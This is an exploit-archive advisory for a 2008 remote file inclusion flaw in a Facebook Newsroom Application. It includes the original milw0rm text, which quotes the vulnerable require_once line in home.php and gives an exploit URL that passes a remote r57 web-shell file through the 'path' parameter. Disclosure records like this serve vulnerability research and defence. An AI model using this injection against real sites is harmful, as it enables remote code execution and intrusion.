Facebook Newsroom Application Remote File Inclusion Vulnerability

vendor:

Facebook Newsroom Application

by:

Ciph3r

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Facebook Newsroom Application

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2008

Facebook Newsroom Application Remote File Inclusion Vulnerability

The Facebook Newsroom Application is vulnerable to Remote File Inclusion. An attacker can exploit this vulnerability by injecting a malicious file through the 'path' parameter in the 'home.php' file. This allows the attacker to execute arbitrary code and potentially gain unauthorized access to the system.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Facebook Newsroom Application to a patched version that addresses the Remote File Inclusion vulnerability.

Source

Exploit-DB raw data:

#####################################################################
#
# Facebook Newsroom Application Remote File Inclusion Vulnerability
#
#####################################################################
#
# Discovered by : Ciph3r
#
#
# MAIL : Ciph3r_blackhat@yahoo.com
#
#
# SP tanx4: Iranian hacker & Kurdish security TEAM
#
# sp TANX2: milw0rm.com & google.com & sourceforge.net
# 
# CMS download : http://sourceforge.net/project/showfiles.php?group_id=221515    
#
# class : remote
#
# risk : high
#
# message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d 
#######################################################################
#
# C0de : 
#
#               
#    require_once ($path.'/classes/feedStories.class.php');
#
#
#######################################################################

 EXPLOIT :

 

 www.[Target].com/path/includes/home.php?path=[r57.txt?]


#######################################################################

# milw0rm.com [2008-07-11]